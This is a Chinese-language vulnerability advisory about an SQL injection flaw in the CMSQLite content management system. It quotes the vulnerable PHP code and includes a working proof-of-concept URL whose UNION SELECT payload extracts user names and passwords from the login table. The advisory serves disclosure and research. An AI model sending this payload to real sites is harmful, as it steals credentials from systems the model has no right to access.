受影响系统:
Netzabdruck.de CMSQLite <= 1.2
描述:
CMSQLite是基于PHP和SQLite的内容管理系统。
CMSQlite的index.php页面存在SQL注入漏洞:
if(isset($_GET[‘c’])){
$contentId=$_GET[‘c’];
}else{
if ($seo_url){
$arrArticleInfo = $SYSTEM->resolveURL($_SERVER[‘REQUEST_URI’], $langId);
if(empty($arrArticleInfo)){
$contentId=1;
}else{
$contentId = $arrArticleInfo[0][‘articleId’];
$module = $arrArticleInfo[0][‘module’];
}
}else{
$contentId=1;
}
}
$HTML->printHead($contentId);
这段代码将URL参数c传送到了printHead():
public function printHead($_contentId){
$sql="SELECT * FROM meta";
$meta = $this->DB->query($sql);
$sql = "SELECT docTitle, docDesc, docKey FROM content WHERE id=$_contentId";
由于未经任何过滤或转义便将c参数被注入到了SQL查询中,这可能导致SQL注入漏洞。
<*来源:Stefan Esser (s.esser@ematters.de)
链接:http://php-security.org/2010/05/15/mops-2010-029-cmsqlite-c-parameter-sql-injection-vulnerability/index.html
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://cmsqlite.audit/index.php?c=2-2%20UNION%20ALL%20SELECT%202,name%20||%20password,%203,4,5,6%20FROM%20login%20limit%201%20–%20x
建议:
厂商补丁:
Netzabdruck.de
————–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。